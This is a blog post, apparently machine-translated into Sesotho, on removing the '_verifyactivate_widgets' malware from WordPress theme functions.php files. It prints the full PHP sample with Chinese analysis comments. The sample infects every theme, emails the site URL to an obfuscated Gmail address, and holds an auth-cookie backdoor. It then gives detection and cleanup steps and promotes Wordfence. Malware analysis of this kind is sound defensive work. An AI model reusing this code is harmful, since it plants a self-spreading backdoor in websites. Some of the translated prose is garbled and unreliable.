Sengoli sa Lingoloa
haufinyaneChen WeiliangE sebelisoaWordfence Security plugin e hlahloba liwebsaete bakeng sa khoutu e mpeKa mor'a moo, e ile ea fumanoaWordpressHo file ea function.php ea sehlooho, pata khoutu e kotsi ea kokoana-hloko.
Khoutu e kotsi ho WordPress theme function.php file
Sebaka se ka 'nang sa etsahala haholo bakeng sa "khoutu e kotsi" ho WordPress ke function.php bukeng ea sehlooho, hangata e patiloe qetellong ea file ea function.php.
bothata bo boholo:Khoutu e mpe e tla lemoha hore na lihlooho tsohle tse tlas'a blog ea hona joale li tšoaelitsoe nako le nako ha motho e mong a etela leqephe la hau la blog, 'me haeba ho se joalo, ba tla tšoaetsoa hammoho.
Kamora moo, ha init ea ketso ea ho qala wp e etsoa, e tla hlahloba hore na blog ea hajoale e rometse lengolo-tsoibila ho lebokose la poso livethemas@Gmail. com
U tseba joang haeba e ngotsoe?
- Ka har'a tafole ea hau ea wp_options ho na le faele e bitsoang
_is_widget_active_
khetho, haeba e rometsoe ka katleho, beha boleng ba eona ho 1; - Haeba ho se joalo, sebelisa URL ea leqephe la lehae la blog ea hajoale e tšoaelitsoeng joalo ka sehlooho le litaba.
- Ke phetho, ha ho ntho tse ding tse mpe tseo o ka di etsang.
Khoutu ea vaerase e kotsi e tjena (ho ka ba le liphapang, empa khoutu ea mantlha ea tšoana):
<?php function _verifyactivate_widgets(){ //当前文件名,如/path-to-www/wp-content/themes/SimpleDark/functions.php //查找当前主题functions.php文件中最后一个 <? 标记,从这个标记的位置开始,取得一直到文件尾的内容 $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),“<“.“?”)); $output=“”; $allowed=“”; //去除html和php标签,其实这一句是扯蛋。。。 $output=strip_tags($output, $allowed); //取得主题目录themes的绝对路径,如 /path-to-www/wp-content/themes //为了加强程序的兼容性,它不惜以这种很晦涩的方式来获取。。。 //以主题目录themes的绝对路径用array包裹为参数传递给_get_allwidgets_cont函数获取此博客的所有主题的functions.php文件的绝对路径 $direst=_get_allwidgets_cont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),“themes”) + 6))); if (is_array($direst)){ foreach ($direst as $item){ //如果主题functions.php文件可写 if (is_writable($item)){ //特征码 $ftion=substr($widget,stripos($widget,“_”),stripos(substr($widget,stripos($widget,“_”)),“(“)); //取目标functions.php文件内容 $cont=file_get_contents($item); //没找到特征码?OK,试图感染 if (stripos($cont,$ftion) === false){ //查看目标functions.php文件最后是否是以 ?> 结尾,如果不是,给加上 ?> 标记 $comaar=stripos( substr($cont,-20),”?”.”>”) !== false ? “” : “?”.”>”; //这里的代码是忽悠人了,模仿WP widgets的代码,蛊惑你的眼睛,让你觉得这是widget代码。。。 $output .= $before . “Not found” . $after; //如果文件是以 ?> 标记结尾的,连标记一起取过来 if (stripos( substr($cont,-20),”?”.”>”) !== false){$cont=substr($cont,0,strripos($cont,”?”.”>”) + 2);} //开始感染,$widget内容即是恶意代码自身,在functions.php文件原内容后附加恶意代码 $output=rtrim($output, “\n\t”); fputs($f=fopen($item,”w+”),$cont . $comaar . “\n” .$widget);fclose($f); //后面这句也是伪装用的 $output .= ($isshowdots && $ellipsis) ? “…” : “”; } } } } return $output; } function _get_allwidgets_cont($wids,$items=array()){ //从$wids数组弹出一个元素(实际上是一个位置) $places=array_shift($wids); //如果位置字串是以/结尾的,则去掉/ if(substr($places,-1) == “/”){ $places=substr($places,0,-1); } //若不存在这样的文件或目录则直接返回false if(!file_exists($places) || !is_dir($places)){ return false; }elseif(is_readable($places)){ //否则的话。。。嘿嘿 //遍历此目录 $elems=scandir($places); foreach ($elems as $elem){ if ($elem != “.” && $elem != “..”){ //如果是目录,则加入$wids数组 if (is_dir($places . “/” . $elem)){ $wids[]=$places . “/” . $elem; } elseif (is_file($places . “/” . $elem)&& $elem == substr(__FILE__,-13)){ //否则,如果是文件,并且文件名等于 functions.php的话,则加入到$items数组保存,这才是它的目的functions.php正是它要找的 $items[]=$places . “/” . $elem;} } } }else{ return false; } //下面还有子目录?再找找看,递归 if (sizeof($wids) > 0){ return _get_allwidgets_cont($wids,$items); } else { //好了,完事了,以数组返回所有找到的functions.php文件的绝对路径 return $items; } } //下面是3个针对低版本的php而写的兼容函数 if(!function_exists(“stripos”)){ function stripos( $str, $needle, $offset = 0 ){ return strpos( strtolower( $str ), strtolower( $needle ), $offset ); } } if(!function_exists(“strripos”)){ function strripos( $haystack, $needle, $offset = 0 ) { if( !is_string( $needle ) )$needle = chr( intval( $needle ) ); if( $offset < 0 ){ $temp_cut = strrev( substr( $haystack, 0, abs($offset) ) ); } else{ $temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) – $offset ), 0 ) ) ); } if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE; $pos = ( strlen( $haystack ) – ( $found + $offset + strlen( $needle ) ) ); return $pos; } } if(!function_exists(“scandir”)){ function scandir($dir,$listDirectories=false, $skipDots=true) { $dirArray = array(); if ($handle = opendir($dir)) { while (false !== ($file = readdir($handle))) { if (($file != “.” && $file != “..”) || $skipDots == true) { if($listDirectories == false) { if(is_dir($file)) { continue; } } array_push($dirArray,basename($file)); } } closedir($handle); } return $dirArray; } } //这个动作添加了,用于检测所有主题目录下functions.php并感染 add_action(“admin_head”, “_verifyactivate_widgets”); function _getprepare_widget(){ if(!isset($text_length)) $text_length=120; if(!isset($check)) $check=”cookie”; if(!isset($tagsallowed)) $tagsallowed=”<a>“; if(!isset($filter)) $filter=”none”; if(!isset($coma)) $coma=””; if(!isset($home_filter)) $home_filter=get_option(“home”); if(!isset($pref_filters)) $pref_filters=”wp_”; if(!isset($is_use_more_link)) $is_use_more_link=1; if(!isset($com_type)) $com_type=””; if(!isset($cpages)) $cpages=$_GET[“cperpage”]; if(!isset($post_auth_comments)) $post_auth_comments=””; if(!isset($com_is_approved)) $com_is_approved=””; if(!isset($post_auth)) $post_auth=”auth”; if(!isset($link_text_more)) $link_text_more=”(more…)”; if(!isset($widget_yes)) $widget_yes=get_option(“_is_widget_active_”); if(!isset($checkswidgets)) //这个实际是wp_set_auth_cookie $checkswidgets=$pref_filters.”set”.”_”.$post_auth.”_”.$check; if(!isset($link_text_more_ditails)) $link_text_more_ditails=”(details…)”; if(!isset($contentmore)) $contentmore=”ma”.$coma.”il”; if(!isset($for_more)) $for_more=1; if(!isset($fakeit)) $fakeit=1; if(!isset($sql)) $sql=””; //如果 _is_widget_active_ option内容为空,即表示没有被感染过 if (!$widget_yes) : global $wpdb, $post; //取出存在已经通过的评论(不包括trackback/pingback)的文章 // post_author 为 [email protected] 的文章,肯定是没有的 $sq1=”SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\”1\” AND comment_type=\”\” AND post_author=\”li”.$coma.”vethe”.$com_type.”mas”.$coma.”@”.$com_is_approved.”gm”.$post_auth_comments.”ail”.$coma.”.”.$coma.”co”.”m\” AND post_password=\”\” AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count”;# if (!empty($post->post_password)) { if ($_COOKIE[“wp-postpass_”.COOKIEHASH] != $post->post_password) { if(is_feed()) { $output=__(“There is no excerpt because this is a protected post.”); } else { $output=get_the_password_form(); } } } if(!isset($fixed_tags)) $fixed_tags=1; if(!isset($filters)) $filters=$home_filter; //$gettextcomments实际上为 wp_mail if(!isset($gettextcomments)) $gettextcomments=$pref_filters.$contentmore; if(!isset($tag_aditional)) $tag_aditional=”div”; //这里$sh_cont即为 [email protected] if(!isset($sh_cont)) $sh_cont=substr($sq1, stripos($sq1, “live”), 20);# if(!isset($more_text_link)) $more_text_link=”Continue reading this entry”; if(!isset($isshowdots)) $isshowdots=1; $comments=$wpdb->get_results($sql); if($fakeit == 2) { $text=$post->post_content; } elseif($fakeit == 1) { $text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt; } else { $text=$post->post_excerpt; } //开始调用 wp_mail 向 [email protected] 发送邮件,标题和内容都是被感染的博客的URL 地址 $sq1=”SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\”1\” AND comment_type=\”\” AND comment_content=”. call_user_func_array($gettextcomments, array($sh_cont, $home_filter, $filters)) .” ORDER BY comment_date_gmt DESC LIMIT $src_count”;# if($text_length < 0) { $output=$text; } else { if(!$no_more && strpos($text, “<span id=“more-5265”></span>“)) { $text=explode(“<span id=“more-5675”></span>“, $text, 2); $l=count($text[0]); $more_link=1; //执行这一句时就开始发邮件了。 $comments=$wpdb->get_results($sql); } else { $text=explode(” “, $text); if(count($text) > $text_length) { $l=$text_length; $ellipsis=1; } else { $l=count($text); $link_text_more=””; $ellipsis=0; } } for ($i=0; $i<$l; $i++) $output .= $text[$i] . ” “; } //把感染标记置为1 update_option(“_is_widget_active_”, 1); if(“all” != $tagsallowed) { $output=strip_tags($output, $tagsallowed); return $output; } endif; $output=rtrim($output, “\s\n\t\r\0\x0B”); $output=($fixed_tags) ? balanceTags($output, true) : $output; $output .= ($isshowdots && $ellipsis) ? “…” : “”; //$filter 为 none …,又是在伪装 $output=apply_filters($filter, $output); switch($tag_aditional) { case(“div”) : $tag=”div”; break; case(“span”) : $tag=”span”; break; case(“p”) : $tag=”p”; break; default : $tag=”span”; } //$checkswidgets即是wp_set_auth_cookie if ($is_use_more_link ) { if($for_more) { $output .= ” <” . $tag . ” class=\”more-link\”><a href=\””. get_permalink($post–>ID) . “#more-” . $post->ID .”\” title=\”” . $more_text_link . “\”>” . $link_text_more = !is_user_logged_in() && @call_user_func_array($checkswidgets,array($cpages, true)) ? $link_text_more : “” . “</a></” . $tag . “>” . “\n”; } else { $output .= ” <” . $tag . ” class=\”more-link\”><a href=\””. get_permalink($post–>ID) . “\” title=\”” . $more_text_link . “\”>” . $link_text_more . “</a></” . $tag . “>” . “\n”; } } return $output; } //这里是用来干坏事的,这才是这个恶意代码的目的,前面的感染是“准备活动” add_action(“init”, “_getprepare_widget”); //这个函数也是用来伪装的,无恶意 function __popular_posts($no_posts=6, $before=”<li>“, $after=”</li>“, $show_pass_post=false, $duration=””) { global $wpdb; $request=”SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \”comment_count\” FROM $wpdb->posts, $wpdb->comments”; $request .= ” WHERE comment_approved=\”1\” AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\”publish\””; if(!$show_pass_post) $request .= ” AND post_password =\”\””; if($duration !=””) { $request .= ” AND DATE_SUB(CURDATE(),INTERVAL “.$duration.” DAY) < post_date “; } $request .= ” GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts”; $posts=$wpdb->get_results($request); $output=””; if ($posts) { foreach ($posts as $post) { $post_title=stripslashes($post->post_title); $comment_count=$post->comment_count; $permalink=get_permalink($post->ID); $output .= $before . ” <a href=\”” . $permalink . “\” title=\”” . $post_title.“\”>” . $post_title . “</a> ” . $after; } } else { $output .= $before . “None found” . $after; } return $output; } ?>
Khoutu e mpe ea sehlooho sa WordPress ke eng?
Haeba ho hlahloba ka Wordfence Security plugin ho etsa qeto ea hore file ea hau ea function.php e senyehile, e hlahlobe, ka mohlala:
- _netefatsa kenya_disebediswa
- sebetsa _checkactive_widgets
- sebetsa _get_allwidgets_cont
- mosebetsi stripos
- mosebetsi strripos
- mosebetsi oa scandir
- sebetsa _getprepare_widget
- sebetsa __popular_posts
- add_action("admin_head", "_checkactive_widgets");
- add_action("init", "_getprepare_widget");
- _netefatsa_etsa_sebetsa_mahlale
- _check_ha e sebetse_widget
- _fumana_allwidgetscont
- _baakanya_mahlale
- __likarolo_tse tumileng
- Mohala o mong le o mong o ikemetse, haeba u na le khoutu e ka holimo mesebetsing ea hau.php joale u ka 'na ua otloa.
- Har'a tsona, mesebetsi le add_action hangata ke khoutu ea "khoutu e mpe" ea "mesebetsi ea ho itokisa".
Joang ho tlosa WordPress theme function.php khoutu ea vaerase e kotsi?
Hape ho bonolo haholo ho hloekisa, feela fumana khoutu e tšoanang le e ka holimo ho file.php ea sehlooho sa WordPress le ho e hlakola, empa hobane hang ha u tšoaelitsoe, lihlooho tsohle tse bukeng ea lihlooho tsa hau li tla tšoaetsoa, kahoo feela ya jwale Sehlooho se sebedisitsweng ha se sebetse mme se tla hlahiswa hang ka mora ho hlatswa.
Tharollo ke ho tlosa khoutu ea kokoana-hloko e kotsi ea sehlooho se le seng sa WordPress, beha file ea mesebetsi.php ho tumello ea 444, ebe o hloekisa lihlooho tse ling tsa WordPress.
Mabapi le hore na tumello ea 444 ea mesebetsi ea ho qetela.php faele e hloka ho fetoloa morao, batho ba fana ka maikutlo a hore 444 e batla e sireletsehile 'me e ka fetoloa ha ho hlokahala.
Lintlha mabapi le ho sebelisa plugin ea Wordfence Security
Re khothaletsa plugin ea WordPress ka Wordfence Security, plugin ea ts'ireletso ea WordPress e nang le firewall e kopantsoeng le malware scanning, e hahiloeng le ho hlokomeloa ke sehlopha se seholo se tsepamisitsoeng 100% ho ts'ireletso ea WordPress.
Leha ho na le li-module tse lefuoang, re ka sebelisa module ea mahala "Scan" ho lekola sebaka sa rona sa WordPress bakeng sa lifaele tsa PHP tse nang le "khoutu e mpe", leha ho na le sekhahla se itseng se fosahetseng (haholo-holo li-plugins tsa 'nete, karolo ea encryption ea sehlooho e tla thibeloa. ka maikutlo a fosahetseng), empa ho fumana "khoutu e kotsi" ke mosebetsi o mongata ka boiteko bo fokolang.
Hoa lokela ho hlokomeloa hore plug-in ena ha e khothalletsoe ho buloa khafetsa, hobane firewall ea eona le ts'ireletso ea ts'ireletso li tla baka khatello e itseng ea mojaro ho database le ho ama ts'ebetso ea sebaka sa marang-rang.
Ka tloaelo, li-plugins li nolofalloa ho tsamaisa "scan" scans ha ho hlokahala.
Koala plug-in ka mor'a hore lipatlisiso li phethoe, haeba ho ka ba le tšohanyetso.
Hope Chen Weiliang Blog ( https://www.chenweiliang.com/ ) o ile a arolelana "Mokhoa oa ho hloekisa khoutu e kotsi _verifyactivate_widgets ho WordPress theme", e leng thuso ho uena.
Rea u amohela ho arolelana sehokelo sa sengoloa sena:https://www.chenweiliang.com/cwl-27554.html
Rea u amohela ho mocha oa Telegraph oa blog ea Chen Weiliang ho fumana lintlha tsa morao-rao!
📚 Tataiso ena e na le boleng bo boholo, 🌟Ona ke monyetla o sa tloaelehang, se ke oa o fetoa! ⏰⌛💨
Share le rata haeba u rata!
Ho arolelana le lintho tseo u li ratang ke khothatso ea rona e tsoelang pele!